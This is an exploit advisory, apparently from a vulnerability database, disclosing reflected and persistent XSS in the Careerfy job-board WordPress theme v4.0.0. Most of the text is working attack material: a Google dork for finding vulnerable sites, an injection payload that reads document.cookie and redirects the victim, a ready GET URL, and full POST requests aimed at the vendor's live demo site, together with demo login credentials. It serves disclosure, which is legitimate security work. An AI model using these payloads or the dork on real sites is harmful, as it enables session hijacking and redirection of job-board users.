Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities

2020.07.18
ru Vlad Vector (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: inurl:/wp-content/themes/careerfy/

[+] Exploit Title: Careerfy - Job Board WordPress Theme v4.0.0 - Multiple Vulnerabilities [+] Google Dork: inurl:/wp-content/themes/careerfy/ [+] Date: 2020-07-05 [+] Exploit Author: Vlad Vector [ https://vladvector.ru ] [+] Vendor: Eyecix [ http://eyecix.com ] [+] Software Version: 4.0.0 [+] Software Link: https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053 [+] Tested on: Debian 10 [+] CVE: [+] CWE: CWE-79 ### [ Info: ] [i] An Unauthenticated Reflected & Multiple Authenticated Persistent XSS vulnerabilities was discovered in the Careerfy Job Board theme v4.0.0 for WordPress. [i] An Authenticated Persistent XSS @ Job Page will trigger on the dashboard area /user-dashboard/?tab=manage-jobs and on the job page itself. [i] Demo account #1 (Candidate @ Careerfy PetCare): vladvector / DJKNFU#$&H#IUFD (login / password) [i] Demo account #2 (Employer @ Careerfy Job Board): vladvector / DJKNFU#$&H#IUFD (login / password) [i] Candidate @ PetCare profile URL: https://careerfy.net/petcare/candidate/vladvector/ [i] Employer @ Job Board profile URL: https://careerfy.net/careerbooster/employer/vladvector/ [i] Employer @ Job Board job URL: https://careerfy.net/careerbooster/job/poc-2/ ### [ Vulnerabilities: ] [x] Unauthenticated Reflected XSS -> /?sector_cat=[payload] [x] Authenticated Persistent XSS -> Candidate Profile (vulnerable field: Full Address) [x] Authenticated Persistent XSS -> Employer Profile (vulnerable fields: Dial Code, Full Address) [x] Authenticated Persistent XSS -> Job Page (vulnerable field: Full Address) ### [ Payload: ] [$] 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;> ### [ PoC Unauthenticated Reflected XSS: ] [!] https://careerfy.net/careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E [!] GET /careerbooster/jobs-listing/?sector_cat=1%22--%3E%3C!--%3Cimg%20src=%22--%3E%22%3E%3Cimg%20src=x%20onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;%3E HTTP/1.1 Host: careerfy.net ### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ] [!] POST /petcare/user-dashboard/?tab=dashboard-settings HTTP/1.1 Host: careerfy.net Content-Type: multipart/form-data; boundary=---------------------------42351733583489166030977870308 Content-Length: 4754 Origin: https://careerfy.net Referer: https://careerfy.net/petcare/user-dashboard/?tab=dashboard-settings Cookie: [cookies_here] -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="user_cvr_photo_cand"; filename="" Content-Type: application/octet-stream -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="u_firstname" Vlad -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="u_lastname" Vector -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="user_profile_slug" vladvector -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_user_public_pview" yes -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_user_dob_whole" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="user_phone" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="dial_code" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="contry_iso_code" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="user_sector" 39 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle" Vlad Vector -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="candidate_salary_type" type_1 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="candidate_salary" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="candidate_salary_currency" default -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="candidate_salary_pos" left -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="candidate_salary_sep" , -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="candidate_salary_deci" 2 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="user_bio" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="academic-level" masters-degree -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="Age" 23` -- 27-years -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="salary" 31337 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="gender" male1 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="industry" hack' -- ing -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="cand_user_facebook_url" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="cand_user_twitter_url" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="cand_user_linkedin_url" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="cand_user_dribbble_url" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_location1" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_location2" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_address" 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;> -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_lat" 37.090240 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_lng" -95.712891 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="jobsearch_field_location_zoom" 12 -----------------------------42351733583489166030977870308 Content-Disposition: form-data; name="user_settings_form" 1 -----------------------------42351733583489166030977870308-- ### [ PoC Authenticated Persistent XSS -> Employer Profile: ] [!] POST /careerbooster/user-dashboard/?tab=dashboard-settings HTTP/1.1 Host: careerfy.net Content-Type: multipart/form-data; boundary=---------------------------22074218576675900842109481301 Content-Length: 5617 Origin: https://careerfy.net Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=dashboard-settings Cookie: [cookies_here] -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_cvr_photo"; filename="" Content-Type: application/octet-stream -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="u_firstname" Vlad -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="u_lastname" Vector -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="display_name" Vlad Vector -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_profile_slug" vladvector -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_user_public_pview" yes -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_phone" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="dial_code" 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;> -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="contry_iso_code" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_website" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_sector" 34 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_dob_mm" 7 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_dob_dd" 5 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_dob_yy" 2020 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_bio" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="founded-since" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="emp_user_facebook_url" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="emp_user_twitter_url" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="emp_user_linkedin_url" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="emp_user_dribbble_url" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_location1" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_location2" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_address" 1"--><!--<img src="-->"><img src=x onerror=alert(`VL?DV?CTOR`);alert(document.cookie);window.location=`https://themeforest.net/user/vladvector`;> -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_lat" 37.090240 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_lng" -95.712891 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_location_zoom" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="team_image"; filename="" Content-Type: application/octet-stream -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_title[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_designation[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_experience[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="team_image"; filename="" Content-Type: application/octet-stream -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_image[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_facebook[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_google[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_twitter[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="jobsearch_field_team_description[]" -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="user_settings_form" 1 -----------------------------22074218576675900842109481301 Content-Disposition: form-data; name="terms_cond_check" on -----------------------------22074218576675900842109481301-- ### [ PoC Authenticated Persistent XSS -> Job Page: ] [!] POST /careerbooster/user-dashboard/?tab=user-job HTTP/1.1 Host: careerfy.net Content-Type: multipart/form-data; boundary=---------------------------2947472569940564910711066421 Content-Length: 4254 Origin: https://careerfy.net Referer: https://careerfy.net/careerbooster/user-dashboard/?tab=user-job Cookie: [cookies_here] -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_title" PoC -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_detail" PoC -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="application_deadline" 15-07-2020 19:04:42 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_sector" 34 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_type" 20 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="get_job_skills[]" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_apply_type" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_apply_url" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_apply_email" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_salary_type" type_1 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_salary" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_max_salary" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_salary_currency" default -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_salary_pos" left -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_salary_sep" , -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_salary_deci" 2 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="offered-salary" 31337 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="career-level" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="experience" 2-years -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="gender" male -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="Industry" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="qualifications" hacking\ 'skills -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="job_attach_files[]"; filename="" Content-Type: application/octet-stream -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_location1" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_location2" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_location3" -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_address" 1"--><!--<img src="--><img src=x onerror=(alert)(document.cookie)//">1 "><svg/onload=';alert(`VL?DV?CTOR`);window.location=`https://twitter.com/vlad_vector`;'> -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_lat" 37.090240 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_lng" -95.712891 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="jobsearch_field_location_zoom" 12 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="user_job_posting" 1 -----------------------------2947472569940564910711066421 Content-Disposition: form-data; name="terms_cond_check" on -----------------------------2947472569940564910711066421-- ### [ Contacts: ] [#] Website: vladvector.ru [#] Telegram: @vladvector [#] Twitter: @vlad_vector [#] GitHub: @vladvector

References:

https://github.com/vladvector/vladvector.github.io/blob/master/exploit/2020-07-05-careerfy-job-board-wordpress-theme-v4-0-0.txt
https://themeforest.net/item/careerfy-job-board-wordpress-theme/21137053


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top